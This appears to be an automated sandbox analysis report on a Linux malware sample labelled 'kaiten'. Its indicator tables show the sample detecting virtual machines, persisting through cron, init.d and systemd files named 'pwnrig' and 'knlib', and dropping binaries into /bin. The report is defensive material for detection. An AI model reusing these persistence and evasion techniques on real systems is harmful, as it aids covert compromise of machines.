kaiten | 696f110b2a10c55c5432e1eaee7938e5135467cc3667cffd890e8e9ac0351756

description	ioc	Process
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent

Checks hardware identifiers (DMI) 1 TTPs 64 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_name	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_name	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_name	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent

Creates/modifies Cron job 1 TTPs 64 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

description	ioc	Process
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.d/pwnrig	Process not Found
File opened for modification	/etc/cron.weekly/sedrIExF3	Process not Found
File opened for modification	/var/spool/cron/.lib-knlib4	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.monthly/sed0wJ3X8	sed
File opened for modification	/etc/cron.d/sedAa1cc9	sed
File opened for modification	/etc/cron.hourly/sedP3kkPr	sed
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.monthly/sedavJjWH	Process not Found
File opened for modification	/etc/cron.hourly/pwnrig	Process not Found
File opened for modification	/etc/cron.monthly/.lib-knlib4	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/etc/cron.daily/sedOz40lb	sed
File opened for modification	/etc/cron.weekly/sedGjHme9	sed
File opened for modification	/var/spool/cron/crontabs/tmp.mF0EUH	crontab
File opened for modification	/etc/cron.monthly/seddx4gSq	sed
File opened for modification	/etc/cron.monthly/sedAztbvi	sed
File opened for modification	/etc/cron.weekly/sedMG9sug	sed
File opened for modification	/etc/cron.monthly/pwnrig	Process not Found
File opened for modification	/etc/cron.weekly/sedEkkLGa	sed
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/etc/cron.hourly/sedfKXgN5	Process not Found
File opened for modification	/etc/cron.d/.lib-knlib4	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/var/spool/cron/.lib-knlib4	Process not Found
File opened for modification	/etc/cron.monthly/.lib-knlib4	Process not Found
File opened for modification	/etc/cron.d/sedSg8N5C	sed
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/etc/cron.hourly/sedxnjuBH	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.URytza	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.gZNDyP	Process not Found
File opened for modification	/etc/cron.monthly/sedvm3z39	Process not Found
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/etc/cron.hourly/sedM74NuD	sed
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/var/spool/cron/crontabs/tmp.sgQd4r	Process not Found
File opened for modification	/etc/cron.weekly/sed6y2qns	Process not Found
File opened for modification	/etc/cron.d/sedS6mbzr	sed
File opened for modification	/etc/cron.monthly/pwnrig	Process not Found
File opened for modification	/etc/cron.d/sedtbuTjG	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.TGRmsV	crontab
File opened for modification	/etc/cron.daily/sedNk72LB	sed
File opened for modification	/var/spool/cron/crontabs/tmp.tVXByT	Process not Found
File opened for modification	/etc/cron.daily/sedx79wpg	sed
File opened for modification	/etc/cron.hourly/sedq0oyzf	sed
File opened for modification	/etc/cron.monthly/sedHiMuWY	Process not Found
File opened for modification	/etc/cron.monthly/sedBJHtrt	Process not Found
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.weekly/sedyeqiEY	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.tYsywi	crontab
File opened for modification	/etc/cron.weekly/sedM2yJrB	sed
File opened for modification	/etc/cron.weekly/pwnrig	Process not Found
File opened for modification	/etc/cron.weekly/pwnrig	Process not Found
File opened for modification	/etc/cron.weekly/sedrwHOuO	Process not Found
File opened for modification	/etc/cron.d/sedtEQnIa	sed
File opened for modification	/var/spool/cron/crontabs/tmp.Cx180V	crontab
File opened for modification	/etc/cron.hourly/sedIFjU30	Process not Found
File opened for modification	/etc/cron.hourly/sed5USWmt	Process not Found
File opened for modification	/etc/cron.hourly/.lib-knlib4	Process not Found
File opened for modification	/etc/cron.daily/.lib-knlib4	Process not Found
File opened for modification	/etc/cron.d/sedCyviZ0	Process not Found
File opened for modification	/etc/cron.hourly/.lib-knlib4	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/etc/cron.hourly/seduSGRk9	sed

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 1 TTPs 22 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

description	ioc	Process
File opened for modification	/etc/init.d/seduPx1zv	Process not Found
File opened for modification	/etc/init.d/pwnrig	Process not Found
File opened for modification	/etc/init.d/pwnrig	Process not Found
File opened for modification	/etc/init.d/sedm8nea0	Process not Found
File opened for modification	/etc/init.d/sedUtzWcE	Process not Found
File opened for modification	/etc/init.d/sedSqTKUV	sed
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/pwnrig	Process not Found
File opened for modification	/etc/init.d/sedffIlzh	Process not Found
File opened for modification	/etc/init.d/sed9UdwLT	Process not Found
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/sedjkYoyc	sed
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/pwnrig	Process not Found
File opened for modification	/etc/init.d/pwnrig	Process not Found
File opened for modification	/etc/init.d/knlib	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/pwnrig	Process not Found
File opened for modification	/etc/init.d/sedga5c13	sed
File opened for modification	/etc/init.d/sedIm2M34	sed
File opened for modification	/etc/init.d/sed8k56YM	Process not Found

Modifies systemd 1 TTPs 17 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence

Boot or Logon Autostart Execution

description	ioc	Process
File opened for modification	/etc/systemd/system/knlibe.service	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/lib/systemd/system/pwnrigl.service	Process not Found
File opened for modification	/lib/systemd/system/pwnrigl.service	Process not Found
File opened for modification	/etc/systemd/system/pwnrige.service	Process not Found
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee
File opened for modification	/lib/systemd/system/pwnrigl.service	Process not Found
File opened for modification	/etc/systemd/system/pwnrige.service	Process not Found
File opened for modification	/etc/systemd/system/pwnrige.service	Process not Found
File opened for modification	/lib/systemd/system/pwnrigl.service	Process not Found
File opened for modification	/etc/systemd/system/pwnrige.service	tee
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee
File opened for modification	/lib/systemd/system/pwnrigl.service	Process not Found
File opened for modification	/etc/systemd/system/pwnrige.service	Process not Found
File opened for modification	/etc/systemd/system/pwnrige.service	Process not Found

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/types	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/types	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/types	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/types	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found

Reads hardware information 1 TTPs 64 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_name	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_name	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/product_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	Process not Found
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	service-agent

Writes file to system bin folder 1 TTPs 42 IoCs

Hijack Execution Flow

description	ioc	Process
File opened for modification	/bin/bprofr	Process not Found
File opened for modification	/bin/bprofr	Process not Found
File opened for modification	/bin/sysdr	Process not Found
File opened for modification	/bin/knlib5	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/bprofr	Process not Found
File opened for modification	/bin/sysdr	Process not Found
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/crondr	Process not Found
File opened for modification	/bin/initdr	Process not Found
File opened for modification	/bin/initdr	Process not Found
File opened for modification	/bin/initdr	Process not Found
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/crondr	Process not Found
File opened for modification	/bin/initdr	Process not Found
File opened for modification	/bin/bprofr	Process not Found
File opened for modification	/bin/crondr	Process not Found
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/initdr	Process not Found
File opened for modification	/bin/crondr	Process not Found
File opened for modification	/bin/sysdr	Process not Found
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/sysdr	cp
File opened for modification	/bin/initdr	Process not Found
File opened for modification	/bin/bprofr	Process not Found
File opened for modification	/bin/bprofr	Process not Found
File opened for modification	/bin/sysdr	cp
File opened for modification	/bin/crondr	Process not Found
File opened for modification	/bin/sysdr	Process not Found
File opened for modification	/bin/crondr	Process not Found
File opened for modification	/bin/sysdr	Process not Found
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/sysdr	cp

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	service-agent
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	Process not Found
File opened for reading	/sys/kernel/mm/hugepages	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	Process not Found
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	service-agent
File opened for reading	/sys/bus/cpu/devices	service-agent
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	Process not Found
File opened for reading	/sys/kernel/mm/hugepages	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	service-agent
File opened for reading	/sys/kernel/mm/hugepages	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	Process not Found
File opened for reading	/sys/bus/dax/devices	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	service-agent
File opened for reading	/sys/bus/node/devices/node0/cpumap	service-agent
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	Process not Found
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	Process not Found
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	Process not Found
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	Process not Found
File opened for reading	/sys/bus/dax/target_node	Process not Found
File opened for reading	/sys/bus/node/devices/node0/hugepages	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	service-agent
File opened for reading	/sys/kernel/mm/hugepages	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	service-agent
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	Process not Found
File opened for reading	/sys/bus/cpu/devices	service-agent
File opened for reading	/sys/bus/node/devices/node0/meminfo	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	service-agent
File opened for reading	/sys/devices/system/node/online	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	Process not Found
File opened for reading	/sys/bus/dax/target_node	Process not Found
File opened for reading	/sys/bus/cpu/devices	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	service-agent
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	service-agent
